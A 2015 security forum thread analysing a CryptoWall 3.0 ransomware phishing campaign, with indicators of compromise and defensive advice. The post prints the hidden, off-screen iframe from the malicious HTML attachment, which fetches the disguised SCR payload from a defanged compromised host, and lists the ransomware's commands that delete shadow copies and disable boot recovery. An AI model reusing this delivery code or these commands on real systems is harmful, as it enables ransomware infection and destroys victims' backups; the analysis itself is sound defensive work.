Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


CryptoWall 3.0 - New, Interesting Phishing Campaign In-the-Wild

  • Please log in to reply
2 replies to this topic

#1 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • Gender:Male
  • Location:::1
  • Local time:12:13 PM

Posted 05 June 2015 - 12:30 AM

MY PRIMARY ARTICLE ON MY OWN SELF-OWNED SITE https://www.emergingthreats.info/v3/article.php?id=4


Just a reminder to all -- CryptoWall 3.0 is still very much active, with phish tactics that I think are less effective, but who knows; maybe they're seeing great success with this method.  Personally, if successful compromise requires additional steps/execution of more than one file that's distributed as an e-mail attachment, I would imagine that the success rate would decline.  But who knows; perhaps the opening of the attached, compressed HTML file resulting in no nefarious activity initially is being used as a method of gaining trust of the targeted user...


CryptoWall 3.0 Still Actively Being Spread as a New Campaign is Discovered in-the-wild

The New Campaign Relies on Phishing
A new campaign spreading CryptoWall 3.0 has been observed in-the-wild, and reported to the administrator of http://malware-traffic-analysis.net who shared several screenshots as well as network traffic logs captured upon execution of the malicious binary.
This campaign is a bit different than others, as it involves two (2) stages of user intervention; the user must execute the initial file attached to the e-mail within a ZIP archive, but then must execute the additional file--a binary file masked as a SCR to appear to be a legitimate Adobe Reader PDF document--which contains the CryptoWall 3.0 payload.
The phishing e-mails are being sent claiming  to contain resumes.  An example phish shared on malware-traffic-analysis is below:


The e-mails appear to be sourced from Yahoo e-mail addresses; a large quantity of these phishing e-mails were logged by the reporting user as being sourced from different Yahoo addresses.  Headers observed within one of the e-mails reveal a sender e-mail address of:

With a source IP address (X-Originating-IP) of 98.1136.216.211.  The attachment, in this case, was named:

Containing a single HTML file named resume3606.html.  The HTML file is quite small, as its sole intention can be described best by the below screenshot of its source code:


The HTML file contains an iframe that calls to what appears to be a compromised domain, now used as a C2 (command-and-control) server by the malware author.  The below URL called by the iframe has been filtered for user safety; this was still distributing the SCR file a few hours ago.

<iframe src="hxxp://coppolarestaurant.com/cgi/resume2.php?id=661" width="418" height="792" style="position:absolute;left:-10450px;"></iframe>
Upon opening the HTML document, this iframe opens the above URL which then prompts the download of a SCR file containing the CryptoWall 3.0 payload, masked to appear to the victim as a legitimate Adobe PDF document.
The attacker has modified the PE header of the file so that the SCR file's icon is that of an Adobe Reader PDF document:


The sample SCR file examined from the above URL was named my_resume_pdf_id_6721-3921-5311.scr
Upon execution, this file launches the CryptoWall 3.0 payload that we all know and despise.
We have already seen CryptoWall 3.0 and analyzed it plenty of times, but this was one of the few times I actually got the sample to run cleanly in a sandbox, so I added some analysis results below, primarily to share new(er) C2 servers, new gateways (if any) utilized, etc.
Brief Analysis
Static Analysis
File Size: 272 KB (278,528 Bytes)
File Type: PE32 Executable (GUI)
Detection Ratio as of 06/04/2015: 4/57
Currently Detected by (as of 06/04/2015):
Dynamic Analysis
DNS Requests

ip-addr.es -> // To get victim's external IP
pinoyjokes.org -> // compromised site, C2 server
gdsprint.com -> // compromised site, C2 server
HTTP Requests
Performs various POST requests; one to ip-addr.es to obtain the victim's external, public-facing IP address, and others to various C2 servers.  The structure of these POST requests are the same or very similar (i.e. different one-letter variable in request), but to different C2 servers:
Example request:

Example response to above:

Example request:

C2 Servers

coppolarestaurant.com ->
pinoyjokes.com ->
gdsprint.com ->
herp.net ->
canbroc-bg.com ->
japaneselink.net ->
Payment Gateways
Sample Subdomain: 7oqnsnzwwnm6zb7q

Associated Files

Injects code into explorer.exe.
Associated Registry Entries

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run ecf7edf (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *cf7edf (logged four times)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 687ddeba (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *87ddeba (logged four times)
Creates Start Menu Entry (Example)

C:\Users\<profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2429bdf.exe
Creates Files Inside User Directory (Example)


CryptoWall3 // * note this was the name I saved and analyzed sample as
Associated Domains Used for Obtaining External, Public-Facing IP Address

Spawned Processes; Process Tree

      C:\Windows\System32\svchost.exe -k netsvcs
      C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Virtual Machine / Analysis Evasion
- Queries a list of all running processes
- Checks the available/free space of all local hard drives
Searches for the following files within the local file system (assumed; these strings were found in memory):

Treat this as a CryptoWall 3.0 refresher, and remember; keep your system updated, and don't open e-mails, especially not e-mail attachments, from unknown senders.  Even if the e-mail appears to be from someone you know--even if the e-mail address displayed as the sender is that of someone you know--if something looks suspicious, it's always best to trust your intuition.  Better safe than sorry.  Stay safe!

Edited by White Hat Mike, 05 June 2015 - 02:02 AM.

Information Security Engineer | Penetration Tester | Forensic Analyst


BC AdBot (Login to Remove)


#2 quietman7


    Bleepin' Janitor

  • Global Moderator
  • 51,756 posts
  • Gender:Male
  • Location:Virginia, USA
  • Local time:12:13 PM

Posted 05 June 2015 - 06:09 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 White Hat Mike

White Hat Mike
  • Topic Starter

  • Members
  • 312 posts
  • Gender:Male
  • Location:::1
  • Local time:12:13 PM

Posted 05 June 2015 - 08:51 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.


Of course.  It's unfortunate that this campaign, that requires users to download and execute two separate files, appears to be quite successful...

Information Security Engineer | Penetration Tester | Forensic Analyst


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users